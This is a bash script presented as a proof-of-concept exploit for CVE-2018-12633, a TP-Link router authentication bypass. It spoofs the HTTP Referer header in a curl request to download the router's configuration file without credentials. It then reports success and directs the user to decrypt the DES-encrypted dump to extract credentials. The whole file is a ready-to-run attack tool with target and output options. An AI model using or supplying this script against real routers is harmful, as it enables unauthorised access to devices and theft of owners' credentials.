#!/bin/bash
# ------------------------------------------------------------------
# [Author]  Ignatius Wilhelmus Kim Kerans
# [Title]   CVE-2018-12633 POC: TP-Link Auth Bypass & Config Dumper
# [Desc]    Exploits logic flaw in HTTP Referer header to bypass
#           authentication and dump the binary configuration file.
# ------------------------------------------------------------------

# --- Configuration ---
DEFAULT_IP="192.168.0.1"
OUTPUT_FILE="router_backup.bin"

# --- Colors for Professional Output ---
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

# --- Function: Usage/Help ---
usage() {
    echo -e "${YELLOW}Usage: $0 -t <target_ip> [-o <output_filename>]${NC}"
    echo "  -t  Target Router IP (Default: 192.168.0.1)"
    echo "  -o  Output filename (Default: router_backup.bin)"
    exit 1
}

# --- Argument Parsing ---
TARGET_IP=$DEFAULT_IP
while getopts "t:o:h" opt; do
    case $opt in
        t) TARGET_IP="$OPTARG" ;;
        o) OUTPUT_FILE="$OPTARG" ;;
        h) usage ;;
        *) usage ;;
    esac
done

# --- Pre-flight Checks ---
echo -e "${YELLOW}[*] Initializing CVE-2018-12633 Exploit Tool...${NC}"

if ! command -v curl &> /dev/null; then
    echo -e "${RED}[!] Error: 'curl' is not installed. Please install it to proceed.${NC}"
    exit 1
fi

echo -e "[*] Target: ${GREEN}$TARGET_IP${NC}"
echo -e "[*] Output: ${GREEN}$OUTPUT_FILE${NC}"

# --- Execution Phase ---
echo -e "${YELLOW}[*] Attempting Referer Header Bypass...${NC}"

# We use -s for silent mode, -f to fail fast on server errors
HTTP_CODE=$(curl -s -o "$OUTPUT_FILE" -w "%{http_code}" \
    -H "Referer: http://$TARGET_IP/mainFrame.htm" \
    "http://$TARGET_IP/userRpm/Romfile.cfg")

# --- Validation Phase ---
if [ "$HTTP_CODE" -eq 200 ] && [ -s "$OUTPUT_FILE" ]; then
    FILE_SIZE=$(du -h "$OUTPUT_FILE" | cut -f1)
    echo -e "${GREEN}[+] SUCCESS! Exploit executed successfully.${NC}"
    echo -e "[+] Configuration dump saved to: ${GREEN}$PWD/$OUTPUT_FILE${NC} ($FILE_SIZE)"
    echo -e "${YELLOW}[!] NEXT STEP: The file is DES encrypted. Use 'decrypt_conf.py' to extract credentials.${NC}"
else
    echo -e "${RED}[!] FAILURE. Server returned HTTP $HTTP_CODE.${NC}"
    echo -e "    Possible causes:"
    echo "    1. The target is patched (Firmware > late 2018)."
    echo "    2. The IP address is incorrect."
    echo "    3. The device is currently locked out (wait 1 hour or reboot device)."
    rm -f "$OUTPUT_FILE" # Clean up empty file
    exit 1
fi
